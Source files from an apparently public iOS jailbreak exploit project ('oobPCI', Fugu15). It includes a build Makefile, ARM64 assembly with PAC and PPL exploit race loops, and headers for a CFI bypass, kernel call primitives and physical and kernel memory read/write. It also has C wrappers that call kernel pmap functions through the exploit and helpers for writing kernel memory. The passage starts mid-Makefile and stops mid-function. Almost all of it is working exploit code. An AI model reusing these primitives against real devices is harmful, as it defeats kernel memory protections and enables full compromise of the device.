HEADERS=$(wildcard Sources/*.h) $(MIG_GENERATED_HEADERS) 19 | 20 | OUTPUT_DIRS=$(dir $(OBJS)) 21 | 22 | all: oobPCI 23 | 24 | .PHONY: all build_clean clean 25 | 26 | oobPCI: build/oobPCI 27 | install_name_tool -change /usr/lib/libSystem.B.dylib /System/DriverKit/System/Library/Frameworks/DriverKit.framework/DriverKit $< 28 | ../../Tools/Exe2Driver/Exe2Driver $< $@ 29 | @chmod +x $@ 30 | @ldid -SoobPCI.entitlements $@ 31 | 32 | build/oobPCI: ensure_output_dirs $(MIG_GENERATED_SOURCES) $(MIG_GENERATED_HEADERS) $(OBJS) 33 | $(CC) -o $@ $(OBJS) $(LDFLAGS) 34 | 35 | build/%.o: %.c $(HEADERS) 36 | $(CC) -c -o $@ $< $(CFLAGS) 37 | 38 | build/%.o: %.S $(HEADERS) 39 | $(CC) -c -o $@ $< $(CFLAGS) --std=c++11 40 | 41 | Sources/generated/%.h Sources/generated/%.c: Sources/%.defs 42 | mig -user $(patsubst %.h,%.c,$@) -header $(patsubst %.c,%.h,$@) -server /dev/null -sheader /dev/null $< 43 | 44 | ensure_output_dirs: 45 | mkdir -p $(OUTPUT_DIRS) 46 | 47 | build_clean: 48 | rm -rf build 49 | 50 | clean: build_clean 51 | rm -f oobPCI 52 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/DriverKitClasses.h: -------------------------------------------------------------------------------- 1 | // 2 | // DriverKitClasses.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef DriverKitClasses_h 10 | #define DriverKitClasses_h 11 | 12 | #ifndef DK_DECLARE_CLASS 13 | #define DK_DECLARE_CLASS(name) extern mach_port_t DKCLASS$$$##name; 14 | #endif 15 | 16 | DK_DECLARE_CLASS(IOUserServer) 17 | DK_DECLARE_CLASS(IODispatchQueue) 18 | DK_DECLARE_CLASS(IOBufferMemoryDescriptor) 19 | DK_DECLARE_CLASS(IODMACommand) 20 | 21 | #endif 22 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/Fugu15KRW.h: -------------------------------------------------------------------------------- 1 | // 2 | // Fugu15KRW.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef Fugu15KRW_h 10 | #define Fugu15KRW_h 11 | 12 | #include 13 | 14 | // Yes, Fugu15KRW supports versioning 15 | // No, I don't plan to actually increase the version number 16 | #define FUGU15KRW_VERSION_0 (uint64_t) 0 17 | #define FUGU15KRW_VERSION_CURRENT FUGU15KRW_VERSION_0 18 | 19 | #define FUGU15KRW_ERROR_BAD_SIZE (uint64_t) 1 20 | #define FUGU15KRW_ERROR_BAD_VERSION (uint64_t) 2 21 | #define FUGU15KRW_ERROR_BAD_REQ_ID (uint64_t) 3 22 | 23 | #define FUGU15KRW_REQ_PPL (mach_msg_id_t) 0xF1500 24 | #define FUGU15KRW_REQ_THSIGN (mach_msg_id_t) 0xF1501 25 | #define FUGU15KRW_REQ_OFFSETS (mach_msg_id_t) 0xF1502 26 | 27 | #define FUGU15KRW_REPLY_PPL (mach_msg_id_t) 0x52F1500 28 | #define FUGU15KRW_REPLY_THSIGN (mach_msg_id_t) 0x52F1501 29 | #define FUGU15KRW_REPLY_OFFSETS (mach_msg_id_t) 0x52F1502 30 | 31 | #define FUGU15KRW_REPLY_ERROR (mach_msg_id_t) 0x46457272 32 | 33 | typedef struct { 34 | mach_msg_header_t mach_header; 35 | uint64_t version; // Our version 36 | uint64_t versionMin; // The minimum version the server has to support 37 | } Fugu15KRWRequestCommon; 38 | 39 | typedef struct { 40 | mach_msg_header_t mach_header; 41 | uint64_t version; // Server version 42 | } Fugu15KRWReplyCommon; 43 | 44 | typedef struct { 45 | 
Fugu15KRWRequestCommon header; 46 | } Fugu15PPLMapRequest; 47 | 48 | typedef struct { 49 | Fugu15KRWReplyCommon header; 50 | uint64_t mapAddr; 51 | } Fugu15PPLMapReply; 52 | 53 | typedef struct { 54 | Fugu15KRWRequestCommon header; 55 | uint64_t signAddr; 56 | } Fugu15ThSignRequest; 57 | 58 | typedef struct { 59 | Fugu15KRWReplyCommon header; 60 | } Fugu15ThSignReply; 61 | 62 | typedef struct { 63 | Fugu15KRWRequestCommon header; 64 | } Fugu15OffsetsRequest; 65 | 66 | typedef struct { 67 | Fugu15KRWReplyCommon header; 68 | uint64_t virtualBase; // As reported in the boot args structure 69 | uint64_t physicalBase; // As reported in the boot args structure 70 | uint64_t vKernelBase; // pKernelBase = vKernelBase - virtualBase + physicalBase 71 | uint64_t kernelSlide; // vKernelBase - default kernel load address 72 | uint64_t kernelTTEP; // Root translation table of the kernel, physical address 73 | } Fugu15OffsetsReply; 74 | 75 | typedef struct { 76 | Fugu15KRWReplyCommon header; 77 | uint64_t errorCode; 78 | } Fugu15ErrorReply; 79 | 80 | #endif /* Fugu15KRW_h */ 81 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/asm.S: -------------------------------------------------------------------------------- 1 | // 2 | // asm.S 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | .text 10 | 11 | .align 4 12 | 13 | #define SYSCALL_PROLOGUE stp x0, x1, [sp, -16]! %% stp x2, x3, [sp, -16]! %% stp x4, x5, [sp, -16]! %% stp x6, x7, [sp, -16]! 
14 | #define SYSCALL_EPILOGUE ldp x6, x7, [sp], 16 %% ldp x4, x5, [sp], 16 %% ldp x2, x3, [sp], 16 %% ldp x0, x1, [sp], 16 15 | 16 | #define DEF_SYSCALL(name, num) .global _##name %% _##name: %% SYSCALL_PROLOGUE %% mov x16, num %% svc #0x80 %% mov x16, x0 %% SYSCALL_EPILOGUE %% bcc name##_end %% cmp x16, #4 %% beq _##name %% mov x16, #-1 %% name##_end: %% mov x0, x16 %% ret 17 | #define DEF_MACHTRAP(name, num) .global _##name %% _##name: %% mov x16, -num %% svc #0x80 %% ret 18 | 19 | .global start 20 | start: 21 | b _main 22 | 23 | .global _pac_exploit_thread 24 | _pac_exploit_thread: 25 | mov x0, x20 26 | bl _mach_port_mod_refs 27 | b _pac_exploit_thread 28 | 29 | .global _pac_exploit_doIt 30 | _pac_exploit_doIt: 31 | ldr x24, [x11, x25] 32 | dmb sy 33 | cmp x24, x20 34 | bne _pac_exploit_doIt 35 | _pac_exploit_doIt_cont: 36 | str x19, [x11, x26] 37 | dmb sy 38 | ldr x24, [x11, x25] 39 | dmb sy 40 | cmp x24, x20 41 | bne _pac_exploit_doIt 42 | str x18, [x11, x27] 43 | dmb sy 44 | b _pac_exploit_doIt_cont 45 | 46 | .global _pac_loop 47 | _pac_loop: 48 | mov x0, #1 49 | adrp x1, _gUserReturnDidHappen@PAGE 50 | str x0, [x1, _gUserReturnDidHappen@PAGEOFF] 51 | b _pac_loop 52 | 53 | .global _ppl_loop 54 | _ppl_loop: 55 | // x0 -> Value to write 56 | // x1 -> Address to write to 57 | // x2 -> Address of done variable 58 | // x3 -> Address of ready variable 59 | mov x4, 1 60 | str x4, [x3] 61 | _ppl_loop_inner: 62 | str x0, [x1] 63 | ldr x3, [x2] 64 | cmp x3, xzr 65 | beq _ppl_loop_inner 66 | _ppl_yield_loop: 67 | // We are done, constantly yield until we're stopped 68 | mov x0, 0 69 | mov x1, 0 70 | mov x2, 0 71 | bl _thread_switch 72 | b _ppl_yield_loop 73 | 74 | .global _ppl_done 75 | _ppl_done: 76 | b _ppl_done 77 | 78 | DEF_SYSCALL(exit, 1) 79 | DEF_SYSCALL(write, 4) 80 | DEF_SYSCALL(getpid, 20) 81 | DEF_SYSCALL(getppid, 39) 82 | DEF_SYSCALL(__semwait_signal, 334) 83 | 84 | DEF_MACHTRAP(vm_allocate, 10) 85 | DEF_MACHTRAP(vm_deallocate, 12) 86 | 
DEF_MACHTRAP(vm_protect, 14) 87 | DEF_MACHTRAP(mach_port_allocate, 16) 88 | DEF_MACHTRAP(mach_port_deallocate, 18) 89 | DEF_MACHTRAP(mach_port_mod_refs, 19) 90 | DEF_MACHTRAP(mach_port_insert_right, 21) 91 | DEF_MACHTRAP(mach_reply_port, 26) 92 | DEF_MACHTRAP(mach_thread_self, 27) 93 | DEF_MACHTRAP(mach_task_self, 28) 94 | DEF_MACHTRAP(mach_host_self, 29) 95 | DEF_MACHTRAP(mach_msg_trap, 31) 96 | DEF_MACHTRAP(mach_msg_overwrite_trap, 32) 97 | DEF_MACHTRAP(thread_switch, 61) 98 | 99 | .data 100 | retvalStorage: 101 | .quad 0 102 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/badRecovery.h: -------------------------------------------------------------------------------- 1 | // 2 | // badRecovery.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef badRecovery_h 10 | #define badRecovery_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | typedef struct { 17 | uint64_t unk; 18 | uint64_t x[29]; 19 | uint64_t fp; 20 | uint64_t lr; 21 | uint64_t sp; 22 | uint64_t pc; 23 | uint32_t cpsr; 24 | // Other stuff 25 | uint64_t other[70]; 26 | } kRegisterState; 27 | 28 | typedef struct { 29 | bool inited; 30 | thread_t gExploitThread; 31 | uint64_t gScratchMemKern; 32 | volatile uint64_t *gScratchMemMapped; 33 | arm_thread_state64_t gExploitThreadState; 34 | uint64_t gSpecialMemRegion; 35 | uint64_t gIntStack; 36 | uint64_t gOrigIntStack; 37 | uint64_t gReturnContext; 38 | uint64_t gACTPtr; 39 | uint64_t gACTVal; 40 | uint64_t gCPUData; 41 | } exploitThreadInfo; 42 | 43 | typedef struct { 44 | bool inited; 45 | thread_t thread; 46 | uint64_t actContext; 47 | kRegisterState signedState; 48 | uint64_t kernelStack; 49 | kRegisterState *mappedState; 50 | uint64_t scratchMemory; 51 | uint64_t *scratchMemoryMapped; 52 | } Fugu14KcallThread; 53 | 54 | bool breakCFI(uint64_t kernelBase); 55 | void deinitFugu15PACBypass(void); 56 | 57 | 
bool setupFugu14Kcall(void); 58 | 59 | void pac_exploit_thread(void); 60 | void pac_exploit_doIt(void); 61 | void pac_loop(void); 62 | 63 | void ppl_loop(void); 64 | void ppl_done(void); 65 | 66 | void kexec(kRegisterState *state, exploitThreadInfo *info); 67 | uint64_t kcall(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8); 68 | 69 | bool kexec_on_new_thread(kRegisterState *kState, thread_t *thread); 70 | 71 | #endif /* badRecovery_h */ 72 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/includeme.h: -------------------------------------------------------------------------------- 1 | // 2 | // includeme.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef includeme_h 10 | #define includeme_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | // SpawnDrv/kexploitd helper functions 18 | #define DBG_DK_FUNC(id) ptrauth_sign_unauthenticated((void*)(0x4142434400ULL + (id * 4ULL)), ptrauth_key_function_pointer, 0) 19 | #define DBG_EXPLOIT_FUNC(id) ptrauth_sign_unauthenticated((void*)(0x4841585800ULL + (id * 4ULL)), ptrauth_key_function_pointer, 0) 20 | 21 | #define DBG_DK_FUNC_CHECKIN DBG_DK_FUNC(0) 22 | #define DBG_DK_FUNC_NOTIFY DBG_DK_FUNC(1) 23 | #define DBG_DK_FUNC_GET_PCI_SIZE DBG_DK_FUNC(2) 24 | 25 | #define DBG_GETOFFSETS_FUNC DBG_EXPLOIT_FUNC(0) 26 | #define DBG_KRW_READY_FUNC DBG_EXPLOIT_FUNC(1) 27 | #define DBG_SET_FAULT_HNDLR DBG_EXPLOIT_FUNC(2) 28 | #define DBG_GET_REQUEST DBG_EXPLOIT_FUNC(3) 29 | #define DBG_SEND_REPLY DBG_EXPLOIT_FUNC(4) 30 | // #define DBG_COPYOUT_PORTS DBG_EXPLOIT_FUNC(5) 31 | #define DBG_WRITE_BOOT_INFO_UINT64 DBG_EXPLOIT_FUNC(6) 32 | #define DBG_WRITE_BOOT_INFO_DATA DBG_EXPLOIT_FUNC(7) 33 | 34 | // Debug stuff 35 | #define DBGPRINT_ADDRVAR(var) printf("[DBG] %s: %s @ %p\n", __func__, #var, (void*) var) 36 
| #define DBGPRINT_VAR(var) printf("[DBG] %s: %s: %p\n", __func__, #var, (void*) (uint64_t) var) 37 | 38 | // Did I mention that I love Swift? 39 | #define guard(cond) if (__builtin_expect(!!(cond), 1)) {} 40 | 41 | #define MEMORY_BARRIER asm volatile("dmb sy"); 42 | 43 | extern void status_update(const char *status); 44 | 45 | #endif /* includeme_h */ 46 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernel.c: --------------------------------------------------------------------------------
//
// kernel.c
// oobPCI
//
// Created by Linus Henze.
// Copyright © 2022 Pinauten GmbH. All rights reserved.
//

#include "kernel.h"

#include "includeme.h"
#include "offsets.h"
#include "badRecovery.h"

// Every function in this file follows the same pattern: resolve one entry of
// gOffsets through SLIDE(), then invoke it with kcall() (declared in
// badRecovery.h), filling unused argument slots with 0.
// SLIDE and gOffsets are not defined in this file (presumably offsets.h -- confirm).

// Calls the function at gOffsets.pmap_enter_options_addr for `pmap`, requesting
// VM_PROT_READ | VM_PROT_WRITE. Returns the kern_return_t of the first call that
// does not report KERN_RESOURCE_SHORTAGE.
// Note the argument order: this wrapper takes (pmap, pa, va) but forwards
// (pmap, va, pa) to kcall.
kern_return_t pmap_enter_options_addr(uint64_t pmap, uint64_t pa, uint64_t va) {
    uint64_t pmap_enter_options_addr_ptr = SLIDE(gOffsets.pmap_enter_options_addr);

    while (1) {
        // The meaning of the trailing 0, 0, 1, 1 arguments is not visible here -- TODO confirm against the callee.
        kern_return_t kr = (kern_return_t) kcall(pmap_enter_options_addr_ptr, pmap, va, pa, VM_PROT_READ | VM_PROT_WRITE, 0, 0, 1, 1);
        if (kr != KERN_RESOURCE_SHORTAGE) {
            return kr;
        }
        else {
            // NOTE(review): the page allocation below is commented out, so on
            // KERN_RESOURCE_SHORTAGE the loop repeats the identical call with no
            // back-off and no retry limit.
            // On resource shortage, alloc new page
            //pmap_alloc_page_for_ppl();
        }
    }
}

// Calls the function at gOffsets.pmap_remove_options for the range [start, end)
// as passed by the caller. The 0x100 options value is passed through as-is;
// its meaning is not shown in this file -- TODO confirm.
void pmap_remove(uint64_t pmap, uint64_t start, uint64_t end) {
    uint64_t pmap_remove_options_ptr = SLIDE(gOffsets.pmap_remove_options);

    kcall(pmap_remove_options_ptr, pmap, start, end, 0x100, 0, 0, 0, 0);
}

// Calls the function at gOffsets.pmap_set_nested with `pmap` as its only
// meaningful argument. The result of kcall is discarded.
void pmap_set_nested(uint64_t pmap) {
    uint64_t pmap_set_nested_ptr = SLIDE(gOffsets.pmap_set_nested);

    kcall(pmap_set_nested_ptr, pmap, 0, 0, 0, 0, 0, 0, 0);
}

// Calls the function at gOffsets.pmap_nest with (grand, subord, vstart, size)
// and returns the kcall result cast to kern_return_t.
kern_return_t pmap_nest(uint64_t grand, uint64_t subord, uint64_t vstart, uint64_t size) {
    uint64_t pmap_nest_ptr = SLIDE(gOffsets.pmap_nest);

    return (kern_return_t) kcall(pmap_nest_ptr, grand, subord, vstart, size, 0, 0, 0, 0);
}

// Calls the function at gOffsets.pmap_mark_page_as_ppl_page with `page` and a
// second argument of 1 (meaning not shown here -- TODO confirm).
// The result of kcall is discarded.
void pmap_mark_page_as_ppl_page(uint64_t page) {
    uint64_t pmap_mark_page_as_ppl_page_ptr = SLIDE(gOffsets.pmap_mark_page_as_ppl_page);

    kcall(pmap_mark_page_as_ppl_page_ptr, page, 1, 0, 0, 0, 0, 0, 0);
}

// Calls the function at gOffsets.pmap_alloc_page_for_kern with no arguments and
// returns the raw 64-bit kcall result.
uint64_t pmap_alloc_page_for_kern(void)
{
    // NOTE(review): despite its name, this local holds the slid address of
    // pmap_alloc_page_for_kern, not pmap_mark_page_as_ppl_page.
    uint64_t pmap_mark_page_as_ppl_page_ptr = SLIDE(gOffsets.pmap_alloc_page_for_kern);
    return kcall(pmap_mark_page_as_ppl_page_ptr, 0, 0, 0, 0, 0, 0, 0, 0);
}

// Obtains a page via pmap_alloc_page_for_kern() and, when the returned value is
// non-zero, passes it to pmap_mark_page_as_ppl_page(). A zero result is silently
// ignored. The thread-option handling is commented out in this version.
void pmap_alloc_page_for_ppl(void)
{
    //thread_t self = current_thread();

    //uint16_t thread_options = self->options;
    //self->options |= TH_OPT_VMPRIV;
    uint64_t pa = pmap_alloc_page_for_kern();
    //self->options = thread_options;

    if (pa != 0) {
        pmap_mark_page_as_ppl_page(pa);
    }
}
-------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernel.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef kernel_h 10 | #define kernel_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | kern_return_t pmap_enter_options_addr(uint64_t pmap, uint64_t pa, uint64_t va); 17 | void pmap_remove(uint64_t pmap, uint64_t start, uint64_t end); 18 | 19 | void pmap_set_nested(uint64_t pmap); 20 | kern_return_t pmap_nest(uint64_t grand, uint64_t subord, uint64_t vstart, uint64_t size); 21 | 22 | void pmap_mark_page_as_ppl_page(uint64_t page); 23 | uint64_t pmap_alloc_page_for_kern(void); 24 | void pmap_alloc_page_for_ppl(void); 25 | 26 | #endif /* kernel_h */ 27 | 28 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernrw_alloc.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernrw_alloc.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef kernrw_alloc_h 10 | #define kernrw_alloc_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool kernread (uint64_t addr, size_t len, void *buffer); 17 | bool kernwrite(uint64_t addr, void *buffer, size_t len); 18 | 19 | uint64_t kmemAlloc(uint64_t size, void **mappedAddr, bool leak); 20 | 21 | #endif /* kernrw_alloc_h */ 22 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/mach_host.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. 
The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | 33 | import ; /* for host_page_size() */ 34 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/oobPCI.h: -------------------------------------------------------------------------------- 1 | // 2 | // oobPCI.c 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | 10 | #ifndef oobPCI_h 11 | #define oobPCI_h 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | bool oobPCI_init(uint64_t *kBase, uint64_t *virtBase, uint64_t *physBase); 18 | 19 | #endif /* oobPCI_h */ 20 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/physrw.h: -------------------------------------------------------------------------------- 1 | // 2 | // physrw.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 
6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef physrw_h 10 | #define physrw_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool buildPhysPrimitive(uint64_t kernelBase); 17 | 18 | // R/W 19 | bool physread(uint64_t addr, size_t len, void *buffer); 20 | bool physwrite(uint64_t addr, void *buffer, size_t len); 21 | 22 | uint64_t rp64(uint64_t addr); 23 | uint32_t rp32(uint64_t addr); 24 | uint16_t rp16(uint64_t addr); 25 | uint8_t rp8(uint64_t addr); 26 | 27 | // Address translation 28 | uint64_t translateAddr_inTTEP(uint64_t ttep, uint64_t virt); 29 | uint64_t translateAddr(uint64_t virt); 30 | 31 | // Internal function 32 | // Can be used once to map arbitrary physical memory 33 | uint64_t physrw_map_once(uint64_t addr); 34 | 35 | #endif /* physrw_h */ 36 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/sleep.c: --------------------------------------------------------------------------------
#include "includeme.h"
#include "generated/task.h"

// Prototype for the __semwait_signal system call stub (defined in asm.S via DEF_SYSCALL).
int __semwait_signal(int cond_sem, int mutex_sem, int timeout, int relative, int64_t tv_sec, int32_t tv_nsec);

// Semaphore used only as a wait object for nanosleep(); created lazily on first use.
semaphore_t clock_sem = 0;

// Blocks the calling thread for tv_sec seconds plus tv_nsec nanoseconds by
// waiting on clock_sem with a relative timeout (timeout = 1, relative = 1).
// Returns whatever __semwait_signal returns.
// Note: this takes the duration by value and is not the POSIX nanosleep() signature.
int nanosleep(int64_t tv_sec, int32_t tv_nsec)
{
    if (clock_sem == 0) {
        // NOTE(review): the kern_return_t of semaphore_create is ignored; if it
        // fails, clock_sem stays 0 and is still passed to __semwait_signal below.
        // The lazy creation is also not guarded against concurrent first calls.
        semaphore_create(mach_task_self_, (semaphore_t *)&clock_sem, 0, 0);
    }
    // Nothing in this file signals clock_sem, so the wait presumably always ends
    // by timeout -- confirm against the rest of the project.
    return __semwait_signal(clock_sem, 0, 1, 1, tv_sec, tv_nsec);
}


// Sleeps for `useconds` microseconds by splitting the value into whole seconds
// and a nanosecond remainder. The remainder is below 1,000,000 microseconds, so
// the nanosecond argument stays below 1,000,000,000 and fits in int32_t.
int usleep(uint64_t useconds)
{
    return nanosleep(useconds / 1000000, 1000 * (useconds % 1000000));
}
-------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/sleep.h: -------------------------------------------------------------------------------- 1 | int nanosleep(int64_t tv_sec, int32_t tv_nsec); 2 | int usleep(uint64_t useconds); 3 | -------------------------------------------------------------------------------- 
/Exploits/oobPCI/Sources/task.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/thread.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 
3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/tlbFail.h: -------------------------------------------------------------------------------- 1 | // 2 | // tlbFail.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef tlbFail_h 10 | #define tlbFail_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool pplBypass(void); 17 | 18 | void* getPhysMapWindow(uint64_t phys); 19 | 20 | bool physwrite_PPL(uint64_t addr, void *buffer, size_t len); 21 | bool kernwrite_PPL(uint64_t addr, void *buffer, size_t len); 22 | 23 | uint64_t pmap_lv2(uint64_t pmap, uint64_t virt); 24 | 25 | #endif /* tlbFail_h */ 26 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/virtrw.c: --------------------------------------------------------------------------------
#include "virtrw.h"

// Buffer and narrow-width helpers layered on the 32/64-bit accessors
// kread32 / kwrite32 / kread64, which virtrw.h declares as block pointers.
// Nothing in this file assigns those block pointers; they must be set
// elsewhere before any function here is called.

// Copies `size` bytes starting at `kaddr` into `output`, fetching 32 bits at a
// time with kread32 and copying the bytes of each word in memory order.
// When `size` is not a multiple of 4, the final kread32 still fetches a full
// word, i.e. up to 3 bytes beyond kaddr + size are read (but not copied).
// NOTE(review): outputOffset is uint32_t while size is size_t, and
// kaddr + size is not checked for wrap-around.
void kreadbuf(uint64_t kaddr, void* output, size_t size)
{
    uint64_t endAddr = kaddr + size;
    uint32_t outputOffset = 0;
    unsigned char* outputBytes = (unsigned char*)output;

    for(uint64_t curAddr = kaddr; curAddr < endAddr; curAddr += 4)
    {
        uint32_t k = kread32(curAddr);

        unsigned char* kb = (unsigned char*)&k;
        for(int i = 0; i < 4; i++)
        {
            // Stop as soon as the requested number of bytes has been copied.
            if(outputOffset == size) break;
            outputBytes[outputOffset] = kb[i];
            outputOffset++;
        }
        if(outputOffset == size) break;
    }
}

// Writes `size` bytes from `input` to `kaddr` in 32-bit steps with kwrite32.
// For a trailing partial word (fewer than 4 bytes left) the existing 32-bit
// value is read first, only its leading bytes are replaced, and the merged
// word is written back, so bytes past kaddr + size keep their old value.
// NOTE(review): that read-modify-write is not atomic with respect to other
// writers of the same word, and inputOffset is uint32_t while size is size_t.
void kwritebuf(uint64_t kaddr, void* input, size_t size)
{
    uint64_t endAddr = kaddr + size;
    uint32_t inputOffset = 0;
    unsigned char* inputBytes = (unsigned char*)input;

    for(uint64_t curAddr = kaddr; curAddr < endAddr; curAddr += 4)
    {
        uint32_t toWrite = 0;
        int bc = 4; // number of bytes of this word taken from `input`

        uint64_t remainingBytes = endAddr - curAddr;
        if(remainingBytes < 4)
        {
            // Partial final word: start from the current contents.
            toWrite = kread32(curAddr);
            bc = (int)remainingBytes;
        }

        unsigned char* wb = (unsigned char*)&toWrite;
        for(int i = 0; i < bc; i++)
        {
            wb[i] = inputBytes[inputOffset];
            inputOffset++;
        }

        kwrite32(curAddr, toWrite);
    }
}

// Reads a 16-bit value at `kaddr` through kreadbuf.
uint16_t kread16(uint64_t kaddr)
{
    uint16_t outBuf;
    kreadbuf(kaddr, &outBuf, sizeof(uint16_t));
    return outBuf;
}

// Reads an 8-bit value at `kaddr` through kreadbuf.
uint8_t kread8(uint64_t kaddr)
{
    uint8_t outBuf;
    kreadbuf(kaddr, &outBuf, sizeof(uint8_t));
    return outBuf;
}

// Writes a 16-bit value at `kaddr` through kwritebuf (partial-word path).
void kwrite16(uint64_t kaddr, uint16_t val)
{
